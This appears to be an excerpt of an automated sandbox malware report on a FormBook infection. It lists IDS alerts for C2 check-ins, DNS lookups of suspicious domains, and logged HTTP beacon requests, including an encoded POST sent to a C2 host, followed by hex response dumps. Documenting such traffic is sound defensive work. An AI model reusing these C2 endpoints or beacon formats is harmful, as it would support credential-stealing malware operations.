            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51248 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51246 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51245 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51246 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51224 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51243 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51235 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51219 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51241 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51251 -> 172.67.220.161:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51244 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51204 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51204 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51221 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51221 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51199 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51228 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51252 -> 172.67.220.161:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51225 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51225 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51233 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51233 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51232 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51249 -> 162.240.81.18:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.kontorpaneli.xyz
            Source: DNS query: www.personal-loans-jp8.xyz
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /zbwq/?mvjDMBx8=yiu0kyrMDZDnaGSHUN6l2/AWenBEPojQbvIrsSiIoULw3Ja/Kxh4uhHPf3lVqybB3F8SgOCipbonbrybGxTRaMG4SCnpngzzUdFAxyNhxQ0Fwwko6x3YD+nfuTkI7r5rP6BNPZw=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.gate-eight.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zch2/?mvjDMBx8=aE5KdauoI4Y2umflLKCriqVYTdzyJYOxKMaFRYlB9+Sv37Nuz5MD+L3RaAAlRIcvVgOa2tpXA3nWnQsvE78wTxh4OatPeg0Yh8Bm15yxUJXRh7FOvkM1aT2MQQJBhGDX4aCwZoM=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.glitterinthegrey.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mjy7/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=cg99eHdIhH6PRmBvzzsY4n38eZmBksl3PUY+KkgGmlThXL3WC2dP6WW67TtKoTiLnNtMIhIq0So6UKQjTmNbIq3Et/8UbAXoANeZC4OXTx0MozCDv0bkromw6gd6nEy8FhxsXmw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.indeks.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cs0724sd92jj.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pziu/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=EY+qgcjcqEvJaY+ALfwoPip36wdjh3xsdSy6XMjMfPv/Ir5Xz5+nGIw7jjJwblfp8IgSbQk1nTysBGMjrt/hxs8d+JiTcx1VzVYwtbha6lbR616oEW2vuE+H/qKkyJ7RSqcP4eo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kontorpaneli.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /76oh/?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.globyglen.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hup/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=dEhQ1XEV2cGux7LKlL+scgcBfO64DeKcVe19yXl7eYIZvhBzatxTyUaQx2TCVW77GzJhrYbmnII2KrJyLin2/kNdYev+ljAzma1yOM1J7qbV9Zx9z1N3S/Qs4ysm8OEw2XKCNmo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.techcables.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.adindadisini15.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kunq/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=e2pBBNKfhlcNZug/MlikLwl2FbwO8O5PulKDyYpFlUnCxZtvvcHmj1jMPp0LVU20n2VhUZuzz0qV7Mfxt0dNEDuQKyzOHg8PupeV8YN8l6deJxHpy2VUY+/g7EuAZK4kmgb6d+0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.stolex.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p2w8/?mvjDMBx8=0JI5pBGkrmioG/Anacpz3k+IMSt3VJctkawy5IUNmMBmvSb9+k0qoiMhp0vaP6Gu/r9KODYGeXzVD0cydytp7UCw+eBZByGBQdX9huLjshPWbKtQplNWiDD8YzK/NJ1wwprBY8Q=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.healthsolutions.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0jqq/?mvjDMBx8=AboyIhWIgkAsu1nqRInTjiDB5La4qA9HyyvfFBNZK/fCO9WV0V/gZMn0uKI8YjcOlIWVaRm32fVlTzhGJzR60qB7FB0ybEu2AENms3yOanM/608x1TKdZl2B8TKOA7VaQ/jM9wk=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.staffmasters.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /osae/?mvjDMBx8=ajGs1OnhgmOjGH0rS1+XMzuDhBRwUFVs9ujDJ3TY3TM9Xr/glBZes+ajendbW/hUbvaGBM0AJFcTAGb0Z858EyBkLc9l3gETAt5Zd72AqHMe/3ljZLi/M9TCgc1RD8Nq02402TA=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.personal-loans-jp8.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sryw/?mvjDMBx8=i/J+8XVQTUqjXYi8BOJp91HUxYZ+c6AWCRJ9n1NtfUqKWarFGtf7pFdZZISJr4cvaVfHP+3ktlD0OUvuvz/pl/98wVf2KGrKM2ftp+skyT71Gb7AHg6oN/3q8TTnk2KegzCTKXU=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kamicare-com.tokyoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4jqu/?mvjDMBx8=7Y4E7U2NZPWflm9zHmqMqimi+5VuLrMg6kjCj1EInif9PGb3NGzDdsXjsV7gO/0L54/q7blUjcSlxFaP/BkUPUPxQ1br5RU9Wx45qk4zaFXeqdDODb3rhKjRzSvczwWVhnNF6PY=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sorriragora.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.gate-eight.net
            Source: global trafficDNS traffic detected: DNS query: www.glitterinthegrey.shop
            Source: global trafficDNS traffic detected: DNS query: www.indeks.space
            Source: global trafficDNS traffic detected: DNS query: www.cs0724sd92jj.cloud
            Source: global trafficDNS traffic detected: DNS query: www.kontorpaneli.xyz
            Source: global trafficDNS traffic detected: DNS query: www.globyglen.info
            Source: global trafficDNS traffic detected: DNS query: www.techcables.shop
            Source: global trafficDNS traffic detected: DNS query: www.adindadisini15.click
            Source: global trafficDNS traffic detected: DNS query: www.stolex.top
            Source: global trafficDNS traffic detected: DNS query: www.healthsolutions.top
            Source: global trafficDNS traffic detected: DNS query: www.staffmasters.online
            Source: global trafficDNS traffic detected: DNS query: www.personal-loans-jp8.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kamicare-com.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.sorriragora.online
            Source: global trafficDNS traffic detected: DNS query: www.cchelvn.shop
            Source: unknownHTTP traffic detected: POST /zch2/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.glitterinthegrey.shopOrigin: http://www.glitterinthegrey.shopContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 213Referer: http://www.glitterinthegrey.shop/zch2/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36Data Raw: 6d 76 6a 44 4d 42 78 38 3d 58 47 52 71 65 74 2b 37 4f 2b 51 4c 37 57 37 75 57 75 47 46 71 64 4d 70 45 4d 72 35 43 36 71 4b 55 63 65 57 66 72 77 6c 70 61 79 30 2f 4a 67 65 32 39 4e 6a 35 73 6e 69 65 68 4d 34 47 36 6f 4f 65 6a 69 6f 2b 62 70 4d 50 33 7a 70 6d 56 74 43 5a 49 4d 57 4f 41 46 35 58 59 35 74 64 41 4a 65 33 2f 78 57 30 62 4c 36 63 4a 43 4f 6a 49 51 32 33 77 6f 6f 57 77 4f 43 63 67 74 4c 79 45 48 78 37 5a 61 66 66 4d 59 6e 4a 5a 37 4b 6f 6c 5a 73 30 71 70 30 47 69 54 30 41 31 64 74 69 46 36 57 58 57 4f 75 44 75 34 55 35 43 57 43 53 63 2b 32 6f 4b 61 6c 51 6c 64 43 45 42 61 51 45 74 2f 4e 48 2b 75 52 35 31 6f 71 6c 78 42 72 Data Ascii: mvjDMBx8=XGRqet+7O+QL7W7uWuGFqdMpEMr5C6qKUceWfrwlpay0/Jge29Nj5sniehM4G6oOejio+bpMP3zpmVtCZIMWOAF5XY5tdAJe3/xW0bL6cJCOjIQ23wooWwOCcgtLyEHx7ZaffMYnJZ7KolZs0qp0GiT0A1dtiF6WXWOuDu4U5CWCSc+2oKalQldCEBaQEt/NH+uR51oqlxBr
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:42:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:42:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 